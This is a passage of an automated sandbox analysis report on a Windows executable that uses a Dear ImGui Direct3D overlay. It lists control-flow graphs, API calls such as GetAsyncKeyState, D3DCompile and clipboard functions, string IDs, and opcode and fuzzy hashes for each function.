                  • String ID: XInputGetCapabilities$XInputGetState$imgui_impl_win32$xinput1_1.dll$xinput1_2.dll$xinput1_3.dll$xinput1_4.dll$xinput9_1_0.dll
                  • API String ID: 1729990740-3912092517
                  • Opcode ID: 9bc4cdddebdbb24053be8490a45e6e684e4ddf6d24828bfcba824dae7251ab0d
                  • Instruction ID: e2a189e5568ba992a586a19ef3f2c3bc67e6b0bfff50da650388a85ca58d9049
                  • Opcode Fuzzy Hash: 9bc4cdddebdbb24053be8490a45e6e684e4ddf6d24828bfcba824dae7251ab0d
                  • Instruction Fuzzy Hash: ED410035A19B81D5E6608B11E64027973B8FB48784F546275DBCD83B64FF3CE46AC740

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 2214 7ff69dce00b0-7ff69dce00e3 2215 7ff69dce00e5-7ff69dce00ec 2214->2215 2216 7ff69dce00ee 2214->2216 2217 7ff69dce00f1-7ff69dce0114 2215->2217 2216->2217 2218 7ff69dce01c0 2217->2218 2219 7ff69dce011a-7ff69dce011e 2217->2219 2220 7ff69dce01c2-7ff69dce01fd call 7ff69dd1cf30 2218->2220 2221 7ff69dce0125-7ff69dce0175 D3DCompile 2219->2221 2222 7ff69dce0120 call 7ff69dce05f0 2219->2222 2221->2218 2225 7ff69dce0177-7ff69dce01b8 2221->2225 2222->2221 2230 7ff69dce01fe-7ff69dce02db 2225->2230 2231 7ff69dce01ba 2225->2231 2232 7ff69dce01bd 2230->2232 2236 7ff69dce02e1-7ff69dce0363 D3DCompile 2230->2236 2231->2232 2232->2218 2236->2218 2239 7ff69dce0369-7ff69dce03ad 2236->2239 2239->2232 2243 7ff69dce03b3-7ff69dce04b4 memset 2239->2243 2248 7ff69dce04bf 2243->2248 2249 7ff69dce04b6-7ff69dce04bd 2243->2249 2250 7ff69dce04c2-7ff69dce04d0 2248->2250 2249->2250 2251 7ff69dce04d5 call 7ff69dd06450 2250->2251 2252 7ff69dce04da-7ff69dce05dc 2251->2252 2252->2220
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: Compile$memset
                  • String ID: @$COLOR$POSITION$TEXCOORD$cbuffer vertexBuffer : register(b0) { float4x4 ProjectionMatrix; }; struct VS_INPUT { float2 pos : POSITION; float4 col : COLOR0; float2 uv : TEXCOORD0; $main$ps_4_0$struct PS_INPUT { float4 pos : SV_POSITION; float4 col : COLOR0; float2 uv : TEXCOORD0; }; sampler sampler0; Texture2D texture0; float4 main(PS_INPUT input) : $vs_4_0
                  • API String ID: 2361541216-1668656389
                  • Opcode ID: 59b769b35d07de50eb1075bb8672ede576f445791be1e2f17107f0f10b21edb3
                  • Instruction ID: 7d86830534eccac99b0975417c7009153310eeeb25ceb2e85a99e25e1b45a8d5
                  • Opcode Fuzzy Hash: 59b769b35d07de50eb1075bb8672ede576f445791be1e2f17107f0f10b21edb3
                  • Instruction Fuzzy Hash: F6E1D6B6604B858AE720CF25E4847DD77B4F788B88F109126DB8C57B28DF79D689CB40

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 2257 7ff69dcd8e10-7ff69dcd8eb0 2258 7ff69dcd97b6 2257->2258 2259 7ff69dcd8eb6-7ff69dcd8edb call 7ff69dce2e70 2257->2259 2261 7ff69dcd97b8-7ff69dcd9816 call 7ff69dd1cf30 2258->2261 2264 7ff69dcd8ef3-7ff69dcd8f7a call 7ff69dcf19e0 call 7ff69dcf1b50 2259->2264 2265 7ff69dcd8edd-7ff69dcd8eec call 7ff69dcf9dd0 2259->2265 2264->2258 2273 7ff69dcd8f80-7ff69dcd8f9a 2264->2273 2265->2264 2274 7ff69dcd8ffa-7ff69dcd9014 2273->2274 2275 7ff69dcd8f9c-7ff69dcd8faf call 7ff69dd1d2b0 2273->2275 2276 7ff69dcd903c-7ff69dcd9040 2274->2276 2277 7ff69dcd9016-7ff69dcd901d 2274->2277 2275->2274 2288 7ff69dcd8fb1-7ff69dcd8ff5 call 7ff69dd1cf50 call 7ff69dd1d1b4 call 7ff69dd1d244 2275->2288 2281 7ff69dcd9042-7ff69dcd9045 2276->2281 2282 7ff69dcd9047-7ff69dcd9058 2276->2282 2279 7ff69dcd901f-7ff69dcd9027 2277->2279 2280 7ff69dcd9029-7ff69dcd9033 2277->2280 2284 7ff69dcd9036-7ff69dcd903a 2279->2284 2280->2284 2281->2282 2285 7ff69dcd90b5-7ff69dcd9131 call 7ff69dcd4ce0 call 7ff69dcdeda0 2281->2285 2286 7ff69dcd905e-7ff69dcd90b2 call 7ff69dd1cf50 call 7ff69dcdf040 2282->2286 2287 7ff69dcd9817-7ff69dcd981f call 7ff69dcd89c0 2282->2287 2284->2276 2284->2277 2304 7ff69dcd9133-7ff69dcd913d 2285->2304 2305 7ff69dcd914f-7ff69dcd9159 2285->2305 2286->2285 2288->2274 2304->2305 2306 7ff69dcd913f-7ff69dcd914d 2304->2306 2307 7ff69dcd9171-7ff69dcd9185 call 7ff69dce62b0 2305->2307 2308 7ff69dcd915b 2305->2308 2309 7ff69dcd9162-7ff69dcd916b strcpy_s 2306->2309 2312 7ff69dcd91de-7ff69dcd91ec GetAsyncKeyState 2307->2312 2313 7ff69dcd9187-7ff69dcd9195 GetAsyncKeyState 2307->2313 2308->2309 2309->2307 2315 7ff69dcd91ee-7ff69dcd91f1 2312->2315 2316 7ff69dcd91fc-7ff69dcd91ff 2312->2316 2313->2312 2314 7ff69dcd9197-7ff69dcd919a 2313->2314 2317 7ff69dcd919c-7ff69dcd91c2 memset 2314->2317 2318 7ff69dcd91c8-7ff69dcd91dc call 7ff69dce5f00 call 7ff69dcee6f0 2314->2318 2319 7ff69dcd91f3-7ff69dcd91f7 call 7ff69dce5f00 2315->2319 2320 7ff69dcd925b 2315->2320 2316->2320 2321 7ff69dcd9201-7ff69dcd9204 2316->2321 2317->2318 2318->2316 2319->2316 2323 7ff69dcd925e-7ff69dcd9356 call 7ff69dd09540 call 7ff69dce3400 call 7ff69dd05160 call 7ff69dce3400 2320->2323 2325 7ff69dcd9207-7ff69dcd9211 GetAsyncKeyState 2321->2325 2347 7ff69dcd93c6-7ff69dcd94e4 call 7ff69dce3400 call 7ff69dd05160 call 7ff69dce4590 2323->2347 2348 7ff69dcd9358-7ff69dcd935f 2323->2348 2328 7ff69dcd9213-7ff69dcd921f call 7ff69dce5f00 2325->2328 2329 7ff69dcd9224-7ff69dcd922c 2325->2329 2328->2329 2329->2325 2330 7ff69dcd922e-7ff69dcd9246 call 7ff69dcefa30 2329->2330 2339 7ff69dcd9256-7ff69dcd9259 2330->2339 2340 7ff69dcd9248-7ff69dcd9254 call 7ff69dce5f00 2330->2340 2339->2323 2340->2323 2360 7ff69dcd94ef-7ff69dcd94f5 2347->2360 2361 7ff69dcd94e6-7ff69dcd94ed 2347->2361 2349 7ff69dcd9360-7ff69dcd9368 2348->2349 2349->2349 2351 7ff69dcd936a-7ff69dcd9370 2349->2351 2351->2347 2353 7ff69dcd9372-7ff69dcd93be call 7ff69dd09760 2351->2353 2353->2347 2363 7ff69dcd9521-7ff69dcd9539 2360->2363 2364 7ff69dcd94f7-7ff69dcd94fe 2360->2364 2361->2360 2362 7ff69dcd950f-7ff69dcd951b 2361->2362 2362->2363 2367 7ff69dcd951d 2362->2367 2368 7ff69dcd9544-7ff69dcd9552 2363->2368 2369 7ff69dcd953b-7ff69dcd953f 2363->2369 2365 7ff69dcd9500-7ff69dcd9507 2364->2365 2366 7ff69dcd9509-7ff69dcd950d 2364->2366 2365->2366 2365->2367 2366->2362 2366->2367 2367->2363 2370 7ff69dcd9771-7ff69dcd9779 2368->2370 2371 7ff69dcd9558-7ff69dcd96da call 7ff69dce3910 call 7ff69dcfa440 call 7ff69dce3990 call 7ff69dcfa530 call 7ff69dcec2c0 call 7ff69dcd89e0 2368->2371 2369->2368 2372 7ff69dcd97af-7ff69dcd97b4 2370->2372 2373 7ff69dcd977b-7ff69dcd978c 2370->2373 2390 7ff69dcd96e3-7ff69dcd96f8 call 7ff69dcd89e0 2371->2390 2391 7ff69dcd96dc-7ff69dcd96df 2371->2391 2372->2261 2375 7ff69dcd978e-7ff69dcd97a1 2373->2375 2376 7ff69dcd97aa call 7ff69dd1d1d4 2373->2376 2375->2376 2378 7ff69dcd97a3-7ff69dcd97a9 _invalid_parameter_noinfo_noreturn 2375->2378 2376->2372 2378->2376 2394 7ff69dcd9705-7ff69dcd971a call 7ff69dcd89e0 2390->2394 2395 7ff69dcd96fa-7ff69dcd9701 2390->2395 2391->2390 2398 7ff69dcd971c-7ff69dcd9723 2394->2398 2399 7ff69dcd9727-7ff69dcd9747 call 7ff69dcee4d0 call 7ff69dce3a20 2394->2399 2395->2394 2398->2399 2399->2370 2404 7ff69dcd9749-7ff69dcd976a 2399->2404 2404->2370
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: AsyncState$memmove$_invalid_parameter_noinfo_noreturnmemsetstrcpy_s
                  • String ID: Always$Hold$Select$Toggle
                  • API String ID: 3396508257-2591452860
                  • Opcode ID: fe55b22fb497a33fe6ad2e659cf4e7b18cebeda2a9398f534bb515cb654f4b80
                  • Instruction ID: 08b8eda6915ed3e6e574e3f3260c2c967abfe3d0d0d0e44931ada5c1d36dec47
                  • Opcode Fuzzy Hash: fe55b22fb497a33fe6ad2e659cf4e7b18cebeda2a9398f534bb515cb654f4b80
                  • Instruction Fuzzy Hash: 3852E432A08785CAE721CF36D8412B97774FF99748F049376DA8C976A5EF38A585CB00

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 2405 7ff69dce1090-7ff69dce10bf 2406 7ff69dce10c1-7ff69dce10c8 2405->2406 2407 7ff69dce10ca 2405->2407 2408 7ff69dce10cd-7ff69dce1150 GetClientRect QueryPerformanceCounter 2406->2408 2407->2408 2409 7ff69dce1152 2408->2409 2410 7ff69dce1159-7ff69dce1165 GetForegroundWindow 2408->2410 2409->2410 2411 7ff69dce11f4-7ff69dce1202 2410->2411 2412 7ff69dce116b-7ff69dce1172 2410->2412 2413 7ff69dce1204-7ff69dce120b 2411->2413 2414 7ff69dce1257-7ff69dce1265 2411->2414 2415 7ff69dce11b2-7ff69dce11b6 2412->2415 2416 7ff69dce1174-7ff69dce1199 ClientToScreen 2412->2416 2413->2414 2417 7ff69dce120d-7ff69dce121d GetKeyState 2413->2417 2418 7ff69dce12ba-7ff69dce12c8 2414->2418 2419 7ff69dce1267-7ff69dce126e 2414->2419 2415->2411 2422 7ff69dce11b8-7ff69dce11c5 GetCursorPos 2415->2422 2420 7ff69dce119b-7ff69dce11a3 SetCursorPos 2416->2420 2421 7ff69dce11a9-7ff69dce11b0 2416->2421 2417->2414 2423 7ff69dce121f-7ff69dce122d 2417->2423 2426 7ff69dce12ca-7ff69dce12d1 2418->2426 2427 7ff69dce131d-7ff69dce132b 2418->2427 2419->2418 2424 7ff69dce1270-7ff69dce1280 GetKeyState 2419->2424 2420->2421 2421->2411 2421->2415 2422->2411 2425 7ff69dce11c7-7ff69dce11d7 ScreenToClient 2422->2425 2428 7ff69dce1243-7ff69dce124d 2423->2428 2429 7ff69dce122f-7ff69dce123e call 7ff69dce2990 2423->2429 2424->2418 2432 7ff69dce1282-7ff69dce1290 2424->2432 2425->2411 2433 7ff69dce11d9-7ff69dce11ef call 7ff69dce2b30 2425->2433 2426->2427 2434 7ff69dce12d3-7ff69dce12e3 GetKeyState 2426->2434 2430 7ff69dce1380-7ff69dce1384 2427->2430 2431 7ff69dce132d-7ff69dce1334 2427->2431 2428->2414 2429->2428 2440 7ff69dce138d-7ff69dce1394 2430->2440 2441 7ff69dce1386-7ff69dce138b 2430->2441 2431->2430 2437 7ff69dce1336-7ff69dce1346 GetKeyState 2431->2437 2438 7ff69dce1292-7ff69dce12a1 call 7ff69dce2990 2432->2438 2439 7ff69dce12a6-7ff69dce12b0 2432->2439 2433->2411 2434->2427 2435 7ff69dce12e5-7ff69dce12f3 2434->2435 2443 7ff69dce12f5-7ff69dce1304 call 7ff69dce2990 2435->2443 2444 7ff69dce1309-7ff69dce1313 2435->2444 2437->2430 2445 7ff69dce1348-7ff69dce1356 2437->2445 2438->2439 2439->2418 2447 7ff69dce139a-7ff69dce139d 2440->2447 2441->2447 2443->2444 2444->2427 2449 7ff69dce136c-7ff69dce1376 2445->2449 2450 7ff69dce1358-7ff69dce1367 call 7ff69dce2990 2445->2450 2451 7ff69dce139f-7ff69dce13a2 call 7ff69dce08c0 2447->2451 2452 7ff69dce13a7-7ff69dce13cd call 7ff69dce0a30 call 7ff69dd1cf30 2447->2452 2449->2430 2450->2449 2451->2452
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: State$Client$CursorScreen$CounterForegroundPerformanceQueryRectWindow
                  • String ID:
                  • API String ID: 1576454153-0
                  • Opcode ID: f5eb1a4d24f708846d2937c974502832aa363529e3f28febb783f5d1bed35742
                  • Instruction ID: fb432766c453dda4691d7bb9a0af6a3fe85c08a9a54b7197c284db4fd9034a19
                  • Opcode Fuzzy Hash: f5eb1a4d24f708846d2937c974502832aa363529e3f28febb783f5d1bed35742
                  • Instruction Fuzzy Hash: E4A1F1B2A08686CAE731CF30D44537977B4FB45788F0852B1E68D86A95EF3CE896C750

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 2459 7ff69dcfcea0-7ff69dcfcf32 call 7ff69dcfccd0 2462 7ff69dcfdb2f 2459->2462 2463 7ff69dcfcf38-7ff69dcfcf5c 2459->2463 2464 7ff69dcfdb31-7ff69dcfdb93 call 7ff69dd1cf30 2462->2464 2465 7ff69dcfcf62-7ff69dcfcfd1 2463->2465 2466 7ff69dcfd358 2463->2466 2468 7ff69dcfcfd3 2465->2468 2469 7ff69dcfcfd9-7ff69dcfcfec malloc 2465->2469 2470 7ff69dcfd35a-7ff69dcfd370 2466->2470 2471 7ff69dcfd346-7ff69dcfd353 2466->2471 2468->2469 2469->2462 2473 7ff69dcfcff2-7ff69dcfd002 2469->2473 2474 7ff69dcfd373-7ff69dcfd3a2 2470->2474 2471->2464 2475 7ff69dcfd308-7ff69dcfd317 2473->2475 2476 7ff69dcfd008-7ff69dcfd013 2473->2476 2477 7ff69dcfd3a4-7ff69dcfd3ac 2474->2477 2478 7ff69dcfd40c-7ff69dcfd410 2474->2478 2481 7ff69dcfd31a-7ff69dcfd344 call 7ff69dcfcdb0 2475->2481 2482 7ff69dcfd016-7ff69dcfd018 2476->2482 2483 7ff69dcfd3ae-7ff69dcfd3e7 2477->2483 2484 7ff69dcfd3e9-7ff69dcfd3f0 2477->2484 2479 7ff69dcfd444-7ff69dcfd448 2478->2479 2480 7ff69dcfd412-7ff69dcfd43f 2478->2480 2486 7ff69dcfd44a-7ff69dcfd493 2479->2486 2487 7ff69dcfd498-7ff69dcfd49b 2479->2487 2485 7ff69dcfd54c-7ff69dcfd566 2480->2485 2481->2471 2489 7ff69dcfd03a 2482->2489 2490 7ff69dcfd01a-7ff69dcfd024 2482->2490 2491 7ff69dcfd3f4-7ff69dcfd408 2483->2491 2484->2491 2496 7ff69dcfd573-7ff69dcfd57b sqrtf 2485->2496 2497 7ff69dcfd568-7ff69dcfd571 2485->2497 2486->2485 2493 7ff69dcfd4a1-7ff69dcfd524 2487->2493 2494 7ff69dcfd526-7ff69dcfd543 2487->2494 2492 7ff69dcfd03d-7ff69dcfd048 2489->2492 2498 7ff69dcfd02a-7ff69dcfd038 2490->2498 2499 7ff69dcfd026 2490->2499 2491->2478 2492->2482 2500 7ff69dcfd04a-7ff69dcfd05d 2492->2500 2493->2485 2494->2485 2501 7ff69dcfd57f-7ff69dcfd599 2496->2501 2497->2501 2498->2492 2499->2498 2502 7ff69dcfd060-7ff69dcfd06d 2500->2502 2503 7ff69dcfd59b-7ff69dcfd5a4 2501->2503 2504 7ff69dcfd5a6-7ff69dcfd5ab sqrtf 2501->2504 2505 7ff69dcfd083-7ff69dcfd085 2502->2505 2506 7ff69dcfd06f-7ff69dcfd081 2502->2506 2507 7ff69dcfd5af-7ff69dcfd5cd call 7ff69dcff1a0 2503->2507 2504->2507 2508 7ff69dcfd0a0-7ff69dcfd0ac 2505->2508 2509 7ff69dcfd087-7ff69dcfd09c 2505->2509 2506->2508 2513 7ff69dcfdad5-7ff69dcfdad9 2507->2513 2514 7ff69dcfd5d3-7ff69dcfd5dd 2507->2514 2508->2502 2511 7ff69dcfd0ae-7ff69dcfd0be 2508->2511 2509->2508 2515 7ff69dcfd0c1-7ff69dcfd0ce 2511->2515 2513->2471 2518 7ff69dcfdadf-7ff69dcfdae5 2513->2518 2516 7ff69dcfd5e3-7ff69dcfd5f9 2514->2516 2517 7ff69dcfd946-7ff69dcfd948 2514->2517 2519 7ff69dcfd0e4-7ff69dcfd0e6 2515->2519 2520 7ff69dcfd0d0-7ff69dcfd0e2 2515->2520 2521 7ff69dcfd600-7ff69dcfd936 2516->2521 2522 7ff69dcfda25-7ff69dcfda2f 2517->2522 2523 7ff69dcfd94e-7ff69dcfd952 2517->2523 2518->2474 2524 7ff69dcfd101-7ff69dcfd10d 2519->2524 2525 7ff69dcfd0e8-7ff69dcfd0fd 2519->2525 2520->2524 2521->2521 2526 7ff69dcfd93c-7ff69dcfd93f 2521->2526 2528 7ff69dcfda31 2522->2528 2529 7ff69dcfda37-7ff69dcfda4e malloc 2522->2529 2527 7ff69dcfd955-7ff69dcfda1f 2523->2527 2524->2515 2530 7ff69dcfd10f-7ff69dcfd13f 2524->2530 2525->2524 2526->2523 2531 7ff69dcfd941 2526->2531 2527->2522 2527->2527 2528->2529 2532 7ff69dcfda54-7ff69dcfda56 2529->2532 2533 7ff69dcfdaea-7ff69dcfdaed 2529->2533 2534 7ff69dcfd140-7ff69dcfd15d 2530->2534 2531->2522 2539 7ff69dcfda6f-7ff69dcfda8d memmove 2532->2539 2540 7ff69dcfda58-7ff69dcfda5b 2532->2540 2537 7ff69dcfdaef-7ff69dcfdaf9 2533->2537 2538 7ff69dcfdb0a-7ff69dcfdb15 2533->2538 2535 7ff69dcfd163-7ff69dcfd166 2534->2535 2536 7ff69dcfd23a-7ff69dcfd23d 2534->2536 2541 7ff69dcfd1ab-7ff69dcfd1b6 2535->2541 2542 7ff69dcfd168-7ff69dcfd1a6 call 7ff69dcfcdb0 2535->2542 2545 7ff69dcfd284-7ff69dcfd297 2536->2545 2546 7ff69dcfd23f-7ff69dcfd241 2536->2546 2543 7ff69dcfdb01-7ff69dcfdb04 free 2537->2543 2544 7ff69dcfdafb 2537->2544 2538->2462 2547 7ff69dcfdb17-7ff69dcfdb21 2538->2547 2549 7ff69dcfda8f-7ff69dcfda99 2539->2549 2550 7ff69dcfdaaa-7ff69dcfdab8 2539->2550 2540->2539 2548 7ff69dcfda5d-7ff69dcfda6a memmove 2540->2548 2556 7ff69dcfd1ec-7ff69dcfd1ef 2541->2556 2557 7ff69dcfd1b8-7ff69dcfd1d0 2541->2557 2542->2541 2543->2538 2544->2543 2562 7ff69dcfd299-7ff69dcfd2a5 2545->2562 2563 7ff69dcfd2a7-7ff69dcfd2ad 2545->2563 2558 7ff69dcfd243-7ff69dcfd26c 2546->2558 2559 7ff69dcfd272-7ff69dcfd282 2546->2559 2560 7ff69dcfdb23 2547->2560 2561 7ff69dcfdb29 free 2547->2561 2548->2539 2551 7ff69dcfdaa1-7ff69dcfdaa4 free 2549->2551 2552 7ff69dcfda9b 2549->2552 2554 7ff69dcfdacc-7ff69dcfdad2 free 2550->2554 2555 7ff69dcfdaba-7ff69dcfdac4 2550->2555 2551->2550 2552->2551 2554->2513 2555->2554 2566 7ff69dcfdac6 2555->2566 2569 7ff69dcfd1f2-7ff69dcfd235 2556->2569 2567 7ff69dcfd1d2-7ff69dcfd1de 2557->2567 2568 7ff69dcfd1e0-7ff69dcfd1ea 2557->2568 2558->2559 2570 7ff69dcfd2df-7ff69dcfd2f8 2559->2570 2560->2561 2561->2462 2564 7ff69dcfd2b1-7ff69dcfd2dd 2562->2564 2563->2564 2564->2570 2566->2554 2567->2569 2568->2569 2569->2570 2570->2534 2571 7ff69dcfd2fe-7ff69dcfd306 2570->2571 2571->2481
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: free$mallocmemmovesqrtf
                  • String ID:
                  • API String ID: 2108133213-0
                  • Opcode ID: 7f0d27a020e663bce000dc5f22a80399d127b5d36ee05a0b42a8d4600ee5f6f1
                  • Instruction ID: cd2002c24f0d579b22bbbc45858b9c49b785fc5b7f6ac8f7d869da464ec005e8
                  • Opcode Fuzzy Hash: 7f0d27a020e663bce000dc5f22a80399d127b5d36ee05a0b42a8d4600ee5f6f1
                  • Instruction Fuzzy Hash: 14728D13A287E885D3278B3650412B9B7A5EF6E784F19D333ED85A6661EF3CE4429700

                  Control-flow Graph

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: ClipboardGlobal$ByteCharMultiWide$AllocCloseDataEmptyFreeLockOpenUnlock
                  • String ID:
                  • API String ID: 1965520120-0
                  • Opcode ID: f2a2943428e35e7a3b85aa477d9dfc28e94676e7e321c7758c7eb0cba5984f16
                  • Instruction ID: 0069ce117c8bf8f440f18ee96b22fae8a9c7b0b8c03cd28708d3cd82b589626c
                  • Opcode Fuzzy Hash: f2a2943428e35e7a3b85aa477d9dfc28e94676e7e321c7758c7eb0cba5984f16
                  • Instruction Fuzzy Hash: CB118631B08B4282FB745F25BA0423962A5FF49BD9F045375DB9E87BA4EE3CD44A8740
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: Clipboard$ByteCharCloseGlobalMultiWide$DataLockOpenUnlockfree
                  • String ID:
                  • API String ID: 2227228011-0
                  • Opcode ID: b8cf825c0043cebc233109e34a3553aa44836e70e0f3a35ffd5ab8584595a5eb
                  • Instruction ID: df6efc3cc1f898ff32a273e36be44d994d6acf18e5ba983d0dc71d80af9a21bd
                  • Opcode Fuzzy Hash: b8cf825c0043cebc233109e34a3553aa44836e70e0f3a35ffd5ab8584595a5eb
                  • Instruction Fuzzy Hash: 10316E31A09B41C2EB608F29F90052976A4FB84B94F544275DEDE87754EF3CE446DB04
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: Message$AsyncCursorDispatchPeekStateTranslate
                  • String ID: ##Background$?
                  • API String ID: 1616596613-2098091685
                  • Opcode ID: b8d1e7d5e33add116c5c716b55cb787a99514aa310461bd0eab7dc4d4ed0196c
                  • Instruction ID: 554ccbb7d86f2a20545902d0d35810996a2f4121216efe79dcb6f0587f580aa0
                  • Opcode Fuzzy Hash: b8d1e7d5e33add116c5c716b55cb787a99514aa310461bd0eab7dc4d4ed0196c
                  • Instruction Fuzzy Hash: 1171C322A18686C5E770CF25D8402BDB774FF94B88F0552B2DACD93665EF2CE449C750
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: sqrtf
                  • String ID:
                  • API String ID: 321154650-0
                  • Opcode ID: d6ca420bdbc43312870783dfaaf2f5885d8e2e0dfa232003c2f7a903dbbc6879
                  • Instruction ID: 35b8a660fa8144c42be5bcdc3bbf57401b17b47d98117b70493f15f74b06ade6
